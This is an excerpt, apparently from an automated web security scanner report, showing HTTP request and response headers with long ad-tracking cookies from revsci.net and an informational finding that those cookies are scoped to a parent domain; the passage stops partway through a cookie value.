Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jlBeHIMH/C1v6FY5PjO22rQpqLIRj7lzGDK0pZ5a28Qjg614UTo+UUZb5s27MU3p+k1fyDJMFC8UMYTHbX5oy7V/9AyP3MKtaUdhNOZLiDzifUwJ6G017VVI1pv3eQy/8vqbtJkyjk7nE4KE7l/wLZt8DhbakiEW/VLtFEXckivfAVqRuzLjZec6jzqKaqKrjFKfHSYNLNHdNVX11b+xXjbYwlDNyJv0Fhoh3zSBDAaKUDjNkPyWg082tNhETKy7tEFVMoqZ4uQwGoPaO/utnIBrsOkDHbwJWsvQGaGUzBhsCsTUS3GspLlv9PXwnuiXdyyzDdBLkO0mpRqHFg8ZjtJA1IYrzt9napRSvbPxXmagthUik25xORIWYKMM7HWh842q0BgXmYHsemlc/aTVfxqrc4qPByTJ1/04AbqT1ntuJN8Y2uTzuJL7+yhOY5PR6c6iO+wh5akL8lEX9k83bGIOi1VbGjYD104xeGlS2VbjzTa9xmTTzPgR4WxHTJ7rSM8NBbzW1HUX2RVATZ0oTIKIxS+0QrtvdM65TwP8es2F6hzh/35CSJ6tH8UW+bnd52pUZcMb0ML4RJKJeoi4STpyI+wRAv4qTNgQqrlgpxeLO6jE3LM1jGedmZzMbpa44eSz2wwCvt/eg8hvBNb0m9iWVuG7zkS6R6mjJHs5aC0GQaVlR3x7MrPAjqaWMiNPYdtPtZsbjVEz8ALgUQRikbtowMS6xzKwPAZe46dB7pUA25X2IyUW/OMLa+vBIGcp73PBb7SrYs=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
Set-Cookie: rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:08 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/223509117.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252Fabout.html%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Ftechflash.com%252F%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LKjcZyqckugFnBiR0Zn/IsFdk0/rFRTV9qpAPalIhg6ctdKRDh0s/thiFDr8zSnOiJzdlLV+GP4C0aP3dFLRyc6fD3eGZF5paPafjW8xN/6f61iDbn5Scf4ENowP7/1SoiwONbYeu6xZ2hfIMUOAP0wYi5HYzKJgrBhF1IX9Zd5O2Lmz0H8o1YhUZ/xNsWLqnbPSclagg1uZdIaEEX2X7mU9PpvkuJOErL8VIsMtmNeV8SkFkjFUOet0KGm5k8I/lS57L9061i+BOKKiB821tSxmzJvLeZjNqwNOktGg05gpiheC/gX34NVB3rHtCa9gdCWhoGBjXZ3Vek0xPaJoM2vQggaeofJWjtEizseUAZ8DqB3Bpvl+Q/ml47cZ0lKw7LawXyD58UNXC+2xj1oRnibe6D3B6lsMl4e22RyFZmDR/wOywu2mQO0J9hOUdK+nxEJozkuDVSbShPypBC8wJaxkeC1d41hzQM4nFlVLgxRcm5VUb+1qf+/lRdlarNizuUBS3eo7geSrmwmp6exVCwVOlj2Jj9fP7BnHPXwJ6dP7KZGbHV8En9dfBTXYwWNTvYgYB0GCPL/kkLLy6LUuk48I5Z8DCPCP3tSYk5a3xRXRYElTnYs44OJZ5L5mDPYj0iANpHQO1GLTP1KwhMnVobAuCAHWLm+4VbxffA3CBtNvKLlD/eF/gh5Wod9cqvBiz1hWTb4ij8COotPmMZcvatmS+hAlW9NvQ+GlR3LFrwx9U+2LONu5piZm6OS4EGsv1cip2BRmgE3yUIBr0q2bfQHwV8zdQzhThHV+MbBRAr2AebL+QcAIdxhTgx7JRKxi78B2nJxMoeJWcbPhr/XUIFqDTIthwHCAaAOn7NcAgDUsPznPOHwK62Y2m2wTSVt2bLefzLQrJsgwvV1ckk6OEkoK+K+oMHP390MTlJ6WZKDNPwPIitLRLuNkCr4NNOtgTNHeOehpjGXbCJn/lx1EAfOT9CRrt/F7ACN11dFiLoKmLbYt+lGtiaDq8E1KHPwNqbKR4pWoNzDoCopSiRYRtZD0Ft8IVgJioAjQ13lkHzlURVaOS50U7/4pN4X6i+A+lEz9OikZ1cOVXnRB9R6iyRafnQwrF/CtuR2+gMIjH7yc8soS/mvr9OcOyaNc6cmvTvza7q7WzE7OVGXcqHdC7x6MOkpZyDWhdtS0/OngDWbqYoAwJYpdiyIl1ijllxC4BtQR1dQ98cyYX/4NTwupjWmJACf4Kiw2z+NZXDXEseCmsCSBnARs0RKdPBkBBp7hjHFHKYmmSu9f6e+2ou02jTP8i1fC0GiKn8WlIPQl+P88osPPlstYfuy1877JO+Aq2okYoZqHk/ZQlwR8xUD9RPH8bTf7BU+eXH3xJq0K22dYC5plTYC4BgxUGVWnSwaeyypAv2r+561/B3gCB3gWwWPSZUvs76UJtUVeF7CblPshXTNoZC0YBMuVqFveGNrPuHEXdO0eMCUFxC6EBHId3CNr1Mt5iGiBtNQ=="; rsi_us_1000000="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"; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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